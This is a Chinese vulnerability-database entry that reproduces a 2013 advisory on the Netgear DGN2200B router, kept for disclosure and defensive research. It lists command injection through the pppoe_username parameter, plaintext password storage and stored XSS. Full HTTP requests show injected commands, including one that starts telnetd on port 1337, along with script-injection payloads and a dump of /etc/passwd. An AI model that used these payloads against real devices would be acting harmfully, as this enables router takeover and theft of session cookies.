Netgear DGN2200B 多个漏洞

发布日期:2013-02-18
更新日期:2013-02-20

受影响系统:
Netgear DGN2200B Wireless Router V1.0.0.36_7.0.36
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 57998
 
NetGear DGN2200B是无线ADSL2+路由器。
 
Netgear DGN2200B 1.0.0.36_7.0.36在实现上存在多个安全漏洞,利用这些漏洞攻击者可获取敏感信息、执行任意命令、执行HTML和脚本代码、窃取cookie等。
 
1、由于没有正确验证输入,攻击者可利用pppoe_username参数在系统内注入并执行任意命令。
 2、密码明文保存。
 3、多个参数没有正确验证导致存在存贮型跨站脚本漏洞,可被经过认证的攻击者利用而注入恶意脚本。
 
<*来源:Michael Messner ([email protected]
 
  链接:http://xforce.iss.net/xforce/xfdb/82126
        http://xforce.iss.net/xforce/xfdb/82127
        http://xforce.iss.net/xforce/xfdb/82128
 *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Michael Messner提供如下信息

 ============  Vulnerable Firmware Releases: ============

 Hardwareversion    DGN2200B
 Firmwareversion    V1.0.0.36_7.0.36 - 04/01/2011
 GUI Sprachversion:  V1.0.0.25

 ============ Device Description: ============

 Infos: http://www.netgear.com/home/products/wirelessrouters/work-and-play/dgn2200.aspx
 http://www.netgear.de/products/home/wireless_routers/work-and-play/DGN2200B.aspx#

 Firmware download: http://kb.netgear.com/app/answers/detail/a_id/18990/~/dgn2200%2Fdgn2200b-firmware-version-1.0.0.36

 ============ Shodan Torks ============

 Shodan Search: NETGEAR DGN2200

 ============ Vulnerability Overview: ============

 * OS Command Injection in the PPOE configuration:

 The vulnerability is caused by missing input validation in the pppoe_username parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to upload and execute a backdoor to compromise the device.

 Param: pppoe_username

 Example Request:
 POST /pppoe.cgi HTTP/1.1
 Host: 192.168.0.1
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Proxy-Connection: keep-alive
 Referer: http://192.168.0.1/BAS_pppoe.htm
 Cookie: uid=vjkqK779eJ
 Authorization: Basic YWRtaW46cGFzc3dvcmQ=
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 593
 Connection: close

 login_type=PPPoE%28PPP+over+Ethernet%29&pppoe_username=%26%20ping%20-c%201%20192%2e168%2e0%2e2%20%26&pppoe_passwd=69cw20hb&pppoe_servicename=&pppoe_dod=1&pppoe_idletime=5&WANAssign=Dynamic&DNSAssign=0&en_nat=1&MACAssign=0&apply=%C3%9Cbernehmen&runtest=yes&wan_ipaddr=0.0.0.0&pppoe_localip=0.0.0.0&wan_dns_sel=0&wan_dns1_pri=0.0.0.0&wan_dns1_sec=...&wan_hwaddr_sel=0&wan_hwaddr_def=84%3A1B%3A5E%3A01%3AE7%3A05&wan_hwaddr2=84%3A1B%3A5E%3A01%3AE7%3A05&wan_hwaddr_pc=5C%3A26%3A0A%3A2B%3AF0%3A3F&wan_nat=1&opendns_parental_ctrl=0&pppoe_flet_sel=&pppoe_flet_type=&pppoe_temp=&opendns_parental_ctrl=0

 => wait around 30 seconds till the configuration is saved and activated

 start telnetd on port 1337:
 %26%20telnetd -p 1337%20%26

 Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DGN2200B-OS-Command-Injection-Telnetd-started.png

 * Insecure Cryptographic Storage:

 There is no password hashing implemented and so it is saved in plain text on the system:

 ~ # cat /etc/passwd
 nobody:*:0:0:nobody:/:/bin/sh
 admin:password:0:0:admin:/:/bin/sh
 guest:guest:0:0:guest:/:/bin/sh
 ~ #

 * stored XSS

 Injecting scripts into the parameter DomainName mode reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.

 -> Zugriffsbeschr&#228;nkungen -> Dienste -> neuen Dienst anlegen -> Dienstname

 Param: userdefined

 Original request:
 POST /fw_serv_add.cgi HTTP/1.1
 Host: 192.168.0.1
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Proxy-Connection: keep-alive
 Referer: http://192.168.0.1/fw_serv.cgi
 Cookie: uid=vjkqK779eJ
 Authorization: Basic xxxx=
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 114

 userdefined="><img src="0" onerror=alert(1)>&protocol=TCP&portstart=1&portend=5&apply=%C3%9Cbernehmen&which_mode=0

 You could also change the request method to HTTP GET:
 http://192.168.0.1/fw_serv_add.cgi?userdefined="><img%20src="0"%20onerror=alert(1)>&protocol=TCP&portstart=1&portend=5&apply=%C3%9Cbernehmen&which_mode=0

 The scriptcode gets executed if you try to edit this service again.

 Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DGN2200B-Stored-XSS-Dienste.png

 * stored XSS:

 Injecting scripts into the parameter ssid mode reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.

 -> Wireless-Konfiguration -> Netzwerkname (SSID)

 Param: ssid
 
 POST /wlg_sec_profile_main.cgi HTTP/1.1
 Host: 192.168.0.1
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Proxy-Connection: keep-alive
 Referer: http://192.168.0.1/WLG_wireless2_2.htm
 Cookie: uid=vjkqK779eJ
 Authorization: Basic xxxx=
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 328

 ssidSelect=1&ssid=%2522%253E%253Cscript%253Ealert%25281%2529%253&WRegion=5&w_channel=0&opmode=20n&enable_ap=1&enable_ssid_bc=1&security_type=AUTO-PSK&passphrase=friendlytrain824&Apply=%C3%9Cbernehmen&tempSetting=0&tempRegion=5&initChannel=0&h_opmode=20n&wds_enable=0&ver_type=WW&pfChanged=0&ssid_sel_submit=0&secure_sel_submit=0

 ============ Solution ============

 No known solution available.

 ============ Credits ============

 The vulnerability was discovered by Michael Messner
 Mail: devnull#at#s3cur1ty#dot#de
 http://www.s3cur1ty.de/m1adv2013-015
 Twitter: @s3cur1ty_de

 ============ Time Line: ============

 17.12.2012 - discovered vulnerability
 18.12.2012 - Privately reported all details to vendor
 18.12.2012 - vendor responded that they will check the reported vulnerability details
 29.01.2013 - vendor contacted me to test a new firmware
 29.01.2013 - /me responded that I need more details about the fixes before I will test the new firmware
 30.01.2013 - vendor reponded that I should just check it
 31.01.2013 - /me responded that I will not check the firmware if they do not provide more details (do not waste my time again!)
 11.02.2013 - vendor responded that he has to declare it internally
 15.02.2013 - public release

 ===================== Advisory end =====================

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
Netgear
 -------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 
http://www.netgear.com/home/products/wirelessrouters/work-and-play/dgn2200.aspx

相关推荐